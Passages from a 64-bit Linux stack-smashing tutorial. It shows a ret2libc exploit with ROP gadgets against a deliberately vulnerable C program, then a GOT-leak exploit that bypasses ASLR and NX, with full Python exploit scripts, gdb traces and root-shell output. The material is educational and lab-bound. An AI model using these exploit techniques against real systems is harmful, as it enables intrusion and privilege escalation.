Next we need to calculate libc’s base address in order to get the address of any library function, or even a gadget, in libc. First, we need to get memset()’s offset from libc.so.6. On my machine, libc.so.6 is at /lib/x86_64-linux-gnu/libc.so.6. You can find yours by using ldd:

# ldd leak
        linux-vdso.so.1 =>  (0x00007ffd5affe000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ff25c07d000)
        /lib64/ld-linux-x86-64.so.2 (0x00005630d0961000)

libc.so.6 contains the offsets of all the functions available to us in libc. To get memset()’s offset, we can use readelf:

# readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep memset
    66: 00000000000a1de0   117 FUNC    GLOBAL DEFAULT   12 wmemset@@GLIBC_2.2.5
   771: 000000000010c150    16 FUNC    GLOBAL DEFAULT   12 __wmemset_chk@@GLIBC_2.4
   838: 000000000008c5c0   247 FUNC    GLOBAL DEFAULT   12 memset@@GLIBC_2.2.5
  1383: 000000000008c5b0     9 FUNC    GLOBAL DEFAULT   12 __memset_chk@@GLIBC_2.3.4

memset()’s offset is at 0x8c5c0. Subtracting this from the leaked memset()’s address will give us libc’s base address.

To find the address of any library function, we just do the reverse and add the function’s offset to libc’s base address. So to find system()’s address, we get its offset from libc.so.6, and add it to libc’s base address.

Here’s our modified exploit that leaks memset()’s address, calculates libc’s base address, and finds the address of system():

# ./poc.py
#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# keep socket open so gdb doesn't get a SIGTERM
while True:
    s.recv(1024)

And here it is in action:

# ./poc.py
Enter input:
Recv:
memset() is at 0x7f9d206e45c0
libc base is 0x7f9d20658000
system() is at 0x7f9d2069e640

Now that we can get any library function address, we can do a ret2libc to complete the exploit. We’ll overwrite memset()’s GOT entry with the address of system(), so that when we trigger a call to memset(), it will call system(“/bin/sh”) instead. Here’s what we need to do:

  1. Overwrite memset()’s GOT entry with the address of system() using read@plt.
  2. Write “/bin/sh” somewhere in memory using read@plt. We’ll use 0x601000 since it’s a writable location with a static address.
  3. Set RDI to the location of “/bin/sh” and return to system().

Here’s the final exploit:

#!/usr/bin/env python

import telnetlib
from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
read_plt   = 0x400580            # address of read@plt
memset_plt = 0x400570            # address of memset@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret
writeable  = 0x601000            # location to write "/bin/sh" to

# leak memset()'s libc address using write@plt
buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

# payload for stage 1: overwrite memset()'s GOT entry using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # stdin
buf += pack("<Q", memset_got)   # address to write to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 2: read "/bin/sh" into 0x601000 using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # junk
buf += pack("<Q", writeable)    # location to write "/bin/sh" to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 3: set RDI to location of "/bin/sh", and call system()
buf += pack("<Q", pop3ret)      # pop rdi; ret
buf += pack("<Q", writeable)    # address of "/bin/sh"
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", memset_plt)   # return to memset@plt which is actually system() now

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

# stage 1: overwrite RIP so we return to write@plt to leak memset()'s libc address
print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# stage 2: send address of system() to overwrite memset()'s GOT entry
print "sending system()'s address", hex(system_addr)
s.send(pack("<Q", system_addr))

# stage 3: send "/bin/sh" to writable location
print "sending '/bin/sh'"
s.send("/bin/sh")

# get a shell
t = telnetlib.Telnet()
t.sock = s
t.interact()

I’ve commented the code heavily, so hopefully that will explain what’s going on. If you’re still a bit confused, attach gdb to socat and step through the process. For good measure, let’s run the binary as the root user, and run the exploit as a non-priviledged user:

koji@pwnbox:/root/work$ whoami
koji
koji@pwnbox:/root/work$ ./poc.py
Enter input:
Recv:
memset() is at 0x7f57f50015c0
libc base is 0x7f57f4f75000
system() is at 0x7f57f4fbb640
+ sending system()'s address 0x7f57f4fbb640
+ sending '/bin/sh'
whoami
root

Got a root shell and we bypassed ASLR, and NX!

We’ve looked at one way to bypass ASLR by leaking an address in the GOT. There are other ways to do it, and I refer you to the ASLR Smack & Laugh Reference for some interesting reading. Before I end off, you may have noticed that you need to have the correct version of libc to subtract an offset from the leaked address in order to get libc’s base address. If you don’t have access to the target’s version of libc, you can attempt to identify it using libc-database. Just pass it the leaked address and hopefully, it will identify the libc version on the target, which will allow you to get the correct offset of a function.

64-bit Linux stack smashing tutorial: Part 2

This is part 2 of my 64-bit Linux Stack Smashing tutorial. In part 1 we exploited a 64-bit binary using a classic stack overflow and learned that we can’t just blindly expect to overwrite RIP by spamming the buffer with bytes. We turned off ASLR, NX, and stack canaries in part 1 so we could focus on the exploitation rather than bypassing these security features. This time we’ll enable NX and look at how we can exploit the same binary using ret2libc.

Setup

The setup is identical to what I was using in part 1. We’ll also be making use of the following:

Ret2Libc

Here’s the same binary we exploited in part 1. The only difference is we’ll keep NX enabled which will prevent our previous exploit from working since the stack is now non-executable:

/* Compile: gcc -fno-stack-protector ret2libc.c -o ret2libc      */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space     */

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    vuln();
    return 0;
}

You can also grab the precompiled binary here.

In 32-bit binaries, a ret2libc attack involves setting up a fake stack frame so that the function calls a function in libc and passes it any parameters it needs. Typically this would be returning to system() and having it execute “/bin/sh”.

In 64-bit binaries, function parameters are passed in registers, therefore there’s no need to fake a stack frame. The first six parameters are passed in registers RDI, RSI, RDX, RCX, R8, and R9. Anything beyond that is passed in the stack. This means that before returning to our function of choice in libc, we need to make sure the registers are setup correctly with the parameters the function is expecting. This in turn leads us to having to use a bit of Return Oriented Programming (ROP). If you’re not familiar with ROP, don’t worry, we won’t be going into the crazy stuff.

We’ll start with a simple exploit that returns to system() and executes “/bin/sh”. We need a few things:

  • The address of system(). ASLR is disabled so we don’t have to worry about this address changing.
  • A pointer to “/bin/sh”.
  • Since the first function parameter needs to be in RDI, we need a ROP gadget that will copy the pointer to “/bin/sh” into RDI.

Let’s start with finding the address of system(). This is easily done within gdb:

gdb-peda$ start
.
.
.
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0x7ffff7a5ac40 <system>

We can just as easily search for a pointer to “/bin/sh”:

gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 3 results, display max 3 items:
ret2libc : 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
ret2libc : 0x6006ff --> 0x68732f6e69622f ('/bin/sh')
    libc : 0x7ffff7b9209b --> 0x68732f6e69622f ('/bin/sh')

The first two pointers are from the string in the binary that prints out “Try to exec /bin/sh”. The third is from libc itself, and in fact if you do have access to libc, then feel free to use it. In this case, we’ll go with the first one at 0x4006ff.

Now we need a gadget that copies 0x4006ff to RDI. We can search for one using ropper. Let’s see if we can find any instructions that use EDI or RDI:

koji@pwnbox:~/ret2libc$ ropper --file ret2libc --search "% ?di"
Gadgets
=======


0x0000000000400520: mov edi, 0x601050; jmp rax;
0x000000000040051f: pop rbp; mov edi, 0x601050; jmp rax;
0x00000000004006a3: pop rdi; ret ;

3 gadgets found

The third gadget that pops a value off the stack into RDI is perfect. We now have everything we need to construct our exploit:

#!/usr/bin/env python

from struct import *

buf = ""
buf += "A"*104                              # junk
buf += pack("<Q", 0x00000000004006a3)       # pop rdi; ret;
buf += pack("<Q", 0x4006ff)                 # pointer to "/bin/sh" gets popped into rdi
buf += pack("<Q", 0x7ffff7a5ac40)           # address of system()

f = open("in.txt", "w")
f.write(buf)

This exploit will write our payload into in.txt which we can redirect into the binary within gdb. Let’s go over it quickly:

  • Line 7: We overwrite RIP with the address of our ROP gadget so when vuln() returns, it executes pop rdi; ret.
  • Line 8: This value is popped into RDI when pop rdi is executed. Once that’s done, RSP will be pointing to 0x7ffff7a5ac40; the address of system().
  • Line 9: When ret executes after pop rdi, execution returns to system(). system() will look at RDI for the parameter it expects and execute it. In this case, it executes “/bin/sh”.

Let’s see it in action in gdb. We’ll set a breakpoint at vuln()’s return instruction:

gdb-peda$ br *vuln+73
Breakpoint 1 at 0x40060f

Now we’ll redirect the payload into the binary and it should hit our first breakpoint:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 128 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(
.
.
.
[-------------------------------------code-------------------------------------]
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe508 --> 0x4006a3 (<__libc_csu_init+99>:    pop    rdi)
0008| 0x7fffffffe510 --> 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
0016| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0024| 0x7fffffffe520 --> 0x0
0032| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0040| 0x7fffffffe530 --> 0x0
0048| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0056| 0x7fffffffe540 --> 0x100000000
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x000000000040060f in vuln ()

Notice that RSP points to 0x4006a3 which is our ROP gadget. Step in and we’ll return to our gadget where we can now execute pop rdi.

gdb-peda$ si
.
.
.
[-------------------------------------code-------------------------------------]
=> 0x4006a3 <__libc_csu_init+99>:   pop    rdi
   0x4006a4 <__libc_csu_init+100>:  ret
   0x4006a5:    data32 nop WORD PTR cs:[rax+rax*1+0x0]
   0x4006b0 <__libc_csu_fini>:  repz ret
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe510 --> 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
0008| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0016| 0x7fffffffe520 --> 0x0
0024| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0032| 0x7fffffffe530 --> 0x0
0040| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0048| 0x7fffffffe540 --> 0x100000000
0056| 0x7fffffffe548 --> 0x400610 (<main>:  push   rbp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00000000004006a3 in __libc_csu_init ()

Step in and RDI should now contain a pointer to “/bin/sh”:

gdb-peda$ si
[----------------------------------registers-----------------------------------]
.
.
.
RDI: 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
.
.
.
[-------------------------------------code-------------------------------------]
   0x40069e <__libc_csu_init+94>:   pop    r13
   0x4006a0 <__libc_csu_init+96>:   pop    r14
   0x4006a2 <__libc_csu_init+98>:   pop    r15
=> 0x4006a4 <__libc_csu_init+100>:  ret
   0x4006a5:    data32 nop WORD PTR cs:[rax+rax*1+0x0]
   0x4006b0 <__libc_csu_fini>:  repz ret
   0x4006b2:    add    BYTE PTR [rax],al
   0x4006b4 <_fini>:    sub    rsp,0x8
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0008| 0x7fffffffe520 --> 0x0
0016| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0024| 0x7fffffffe530 --> 0x0
0032| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0040| 0x7fffffffe540 --> 0x100000000
0048| 0x7fffffffe548 --> 0x400610 (<main>:  push   rbp)
0056| 0x7fffffffe550 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00000000004006a4 in __libc_csu_init ()

Now RIP points to ret and RSP points to the address of system(). Step in again and we should now be in system()

gdb-peda$ si
.
.
.
[-------------------------------------code-------------------------------------]
   0x7ffff7a5ac35 <cancel_handler+181>: pop    rbx
   0x7ffff7a5ac36 <cancel_handler+182>: ret
   0x7ffff7a5ac37:  nop    WORD PTR [rax+rax*1+0x0]
=> 0x7ffff7a5ac40 <system>: test   rdi,rdi
   0x7ffff7a5ac43 <system+3>:   je     0x7ffff7a5ac50 <system+16>
   0x7ffff7a5ac45 <system+5>:   jmp    0x7ffff7a5a770 <do_system>
   0x7ffff7a5ac4a <system+10>:  nop    WORD PTR [rax+rax*1+0x0]
   0x7ffff7a5ac50 <system+16>:  lea    rdi,[rip+0x13744c]        # 0x7ffff7b920a3

At this point if we just continue execution we should see that “/bin/sh” is executed:

gdb-peda$ c
[New process 11114]
process 11114 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
[New process 11115]
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
process 11115 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
[Inferior 3 (process 11115) exited normally]
Warning: not running or target is remote

Perfect, it looks like our exploit works. Let’s try it and see if we can get a root shell. We’ll change ret2libc’s owner and permissions so that it’s SUID root:

koji@pwnbox:~/ret2libc$ sudo chown root ret2libc
koji@pwnbox:~/ret2libc$ sudo chmod 4755 ret2libc

Now let’s execute our exploit much like we did in part 1:

koji@pwnbox:~/ret2libc$ (cat in.txt ; cat) | ./ret2libc
Try to exec /bin/sh
Read 128 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(
whoami
root

Got our root shell again, and we bypassed NX. Now this was a relatively simple exploit that only required one parameter. What if we need more? Then we need to find more gadgets that setup the registers accordingly before returning to a function in libc. If you’re up for a challenge, rewrite the exploit so that it calls execve() instead of system(). execve() requires three parameters:

int execve(const char *filename, char *const argv[], char *const envp[]);

This means you’ll need to have RDI, RSI, and RDX populated with proper values before calling execve(). Try to use gadgets only within the binary itself, that is, don’t look for gadgets in libc.